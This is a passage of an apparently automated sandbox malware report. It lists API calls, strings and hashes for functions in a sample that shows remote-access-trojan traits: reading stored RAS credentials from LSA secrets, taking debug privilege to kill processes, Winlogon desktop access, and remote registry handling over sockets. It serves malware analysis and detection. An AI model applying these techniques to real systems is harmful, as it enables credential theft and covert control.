                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: mallocstrrchr
                                • String ID: D
                                • API String ID: 4015919094-2746444292
                                • Opcode ID: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
                                • Instruction ID: 2b82c579dc5669429a94ef84c94f4a8368c9f4a2e82ed412c6c1b6dee6f6c207
                                • Opcode Fuzzy Hash: fbf76794677e61538c32722502434da418faac4525dead3320a30888519af9fe
                                • Instruction Fuzzy Hash: C5115BB62042104BE704DA28AC406AB77DAF7D5732F04053EFE46C7340DABA994EC7B2
                                APIs
                                • LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
                                • LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 10007205
                                Strings
                                • L$_RasDefaultCredentials#0, xrefs: 100071B5
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: DataOpenPolicyPrivateRetrieve
                                • String ID: L$_RasDefaultCredentials#0
                                • API String ID: 1655749231-2801509457
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strrchr
                                • String ID: Ball Update$D
                                • API String ID: 3418686817-2654422192
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050B6
                                • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 004050CC
                                • LCMapStringW.KERNEL32(?,?,?,00000000,oD@ ,?,?,0040446F,00200020,00000000,?,00000000), ref: 004050FF
                                • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 00405167
                                • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,oD@ ,?,00000000,00000000,?,00000000,?,0040446F,00200020,00000000,?,00000000), ref: 0040518C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: String$ByteCharMultiWide
                                • String ID: oD@
                                • API String ID: 352835431-4270158488
                                APIs
                                • OutputDebugStringA.KERNEL32(s Loop_RegeditManager(SOCKET sRemote)), ref: 10009ED7
                                  • Part of subcall function 10003780: WSAStartup.WS2_32(00000202,?), ref: 100037ED
                                  • Part of subcall function 10003780: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100037FB
                                  • Part of subcall function 10003940: ResetEvent.KERNEL32(?,76F923A0,00000000,?,?,?,?,?,10002644,?,?), ref: 10003953
                                  • Part of subcall function 10003940: socket.WS2_32 ref: 10003966
                                • OutputDebugStringA.KERNEL32(s !socketClient.Connect !=-1), ref: 10009F23
                                  • Part of subcall function 10003880: WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
                                  • Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038DF
                                  • Part of subcall function 10003880: CloseHandle.KERNEL32(?), ref: 100038E8
                                  • Part of subcall function 10003880: WSACleanup.WS2_32 ref: 100038EA
                                Strings
                                • s !socketClient.Connect !=-1, xrefs: 10009F1E
                                • s Loop_RegeditManager(SOCKET sRemote), xrefs: 10009ED2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseDebugEventHandleOutputString$CleanupCreateObjectResetSingleStartupWaitsocket
                                • String ID: s !socketClient.Connect !=-1$s Loop_RegeditManager(SOCKET sRemote)
                                • API String ID: 660129190-2143064718
                                APIs
                                  • Part of subcall function 10011F80: GetCurrentProcess.KERNEL32(00000028,?,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F90
                                  • Part of subcall function 10011F80: OpenProcessToken.ADVAPI32(00000000,?,10009CF0,?,00000000,00000000,00000001), ref: 10011F97
                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 10011F33
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 10011F3E
                                • CloseHandle.KERNEL32(00000000), ref: 10011F45
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Open$CloseCurrentHandleTerminateToken
                                • String ID: SeDebugPrivilege
                                • API String ID: 3822579153-2896544425
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 10012B11
                                • GetThreadDesktop.USER32(00000000), ref: 10012B18
                                  • Part of subcall function 10012AC0: OpenDesktopA.USER32(?,00000000,00000000,400001CF), ref: 10012AD3
                                • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 10012B44
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: DesktopThread$CurrentMessageOpenPost
                                • String ID: Winlogon
                                • API String ID: 1322334875-744610081
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,PeekNamedPipe), ref: 1001138A
                                • GetProcAddress.KERNEL32(00000000), ref: 10011391
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: PeekNamedPipe$kernel32.dll
                                • API String ID: 2574300362-3402591003
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,WaitForMultipleObjects), ref: 1001148A
                                • GetProcAddress.KERNEL32(00000000), ref: 10011491
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: WaitForMultipleObjects$kernel32.dll
                                • API String ID: 2574300362-425320575
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00402F62), ref: 004026E0
                                • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00402F62), ref: 00402704
                                • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00402F62), ref: 0040271E
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00402F62), ref: 004027DF
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00402F62), ref: 004027F6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AllocVirtual$FreeHeap
                                • String ID:
                                • API String ID: 714016831-0
                                APIs
                                • lstrlen.KERNEL32(76F90F00,?,00000000,76F90F00,00000000,10002605,00000000,?), ref: 100011CE
                                • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 100011D8
                                • strchr.MSVCRT ref: 100011FA
                                • strchr.MSVCRT ref: 10001213
                                • atoi.MSVCRT(00000001), ref: 10001220
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strchr$??2@atoilstrlen
                                • String ID:
                                • API String ID: 3786266066-0
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED36
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000ED88
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A048,000000FF), ref: 1000ED98
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000EDF6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@$Open
                                • String ID:
                                • API String ID: 2374869923-0
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EBA6
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EBF8
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A028,000000FF), ref: 1000EC08
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EC62
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@$Open
                                • String ID:
                                • API String ID: 2374869923-0
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EE96
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EEE8
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EEF8
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EF52
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@$Open
                                • String ID:
                                • API String ID: 2374869923-0
                                • Opcode ID: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
                                • Instruction ID: 529d2750a5032d3fa2bb58871a274eaf41767a3587e5389a20a4cf427fd15475
                                • Opcode Fuzzy Hash: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
                                • Instruction Fuzzy Hash: 5331F5762046895BD308DE24C85166BB3D6FBC8750F44493CFA1693381DB36ED09C752
                                APIs
                                • LookupAccountSidA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000001,00000000), ref: 1001188D
                                • LookupAccountSidA.ADVAPI32(00000000,?,00000008,00000000,?,00000001,00000000), ref: 100118D3
                                • wsprintfA.USER32 ref: 10011901
                                • 741324A0.WTSAPI32(?), ref: 10011917
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AccountLookup$741324wsprintf
                                • String ID:
                                • API String ID: 3699563385-0
                                • Opcode ID: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                                • Instruction ID: 75ed8c1a40449dc84bd528c53c0faca8b09c11902cbaf50b3a4e55cf154f28bc
                                • Opcode Fuzzy Hash: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                                • Instruction Fuzzy Hash: F5316D71208346AFE714CE55C8D4DABB3E9FBC8244F404E2DF68997240EA70ED498B62
                                APIs
                                • RtlEnterCriticalSection.NTDLL(?), ref: 100034DE
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 100034F4
                                • memmove.MSVCRT(00000000,?,00000000,?,?,?,?,10003C99,?,00000005,00000005,00000000,?,?,?,?), ref: 10003545
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 1000356B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$Leave$Entermemmove
                                • String ID:
                                • API String ID: 72348100-0
                                • Opcode ID: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
                                • Instruction ID: 41d1a370f2508b90d1dbac8cc85ef313bd04c1718ccfcefffe6925d1250f8bb9
                                • Opcode Fuzzy Hash: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
                                • Instruction Fuzzy Hash: 7D11B2363047149BEB05EF749C9946FBBDDEB45291700842DF90397356EE61ED088690
                                APIs
                                • LocalSize.KERNEL32(00000000), ref: 1000E86E
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E87A
                                • LocalSize.KERNEL32(00000000), ref: 1000E895
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E8A1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FreeSize
                                • String ID:
                                • API String ID: 2726095061-0
                                • Opcode ID: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
                                • Instruction ID: 4cc34419d7a70d166c584db2d14c90f329438d3833b5948d6052ee62cb9623d3
                                • Opcode Fuzzy Hash: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
                                • Instruction Fuzzy Hash: 3711BE75105A909BF225EB14CC92BFFB39DEF85390F044A29F955A3288CF34AC05C7A2
                                APIs
                                • FreeLibrary.KERNEL32(?,00000000,00000000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401570
                                • VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401597
                                • GetProcessHeap.KERNEL32(00000000,00401127,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 004015A0
                                • HeapFree.KERNEL32(00000000,?,00000000,0040171B,?), ref: 004015A7
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Free$Heap$LibraryProcessVirtual
                                • String ID:
                                • API String ID: 548792435-0
                                • Opcode ID: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
                                • Instruction ID: 2d8dcf72d340e61f505ec02cbb84714f2cdd3d0f75e656bd935d2cd45be4ba94
                                • Opcode Fuzzy Hash: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
                                • Instruction Fuzzy Hash: 91113C71740701ABD720CB6ADC85F17B7E8AF88750F054929F55BEB2E0CB34E8418B58
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
                                • CloseHandle.KERNEL32(?), ref: 100038DF
                                • CloseHandle.KERNEL32(?), ref: 100038E8
                                • WSACleanup.WS2_32 ref: 100038EA
                                  • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                  • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                  • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                  • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                  • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
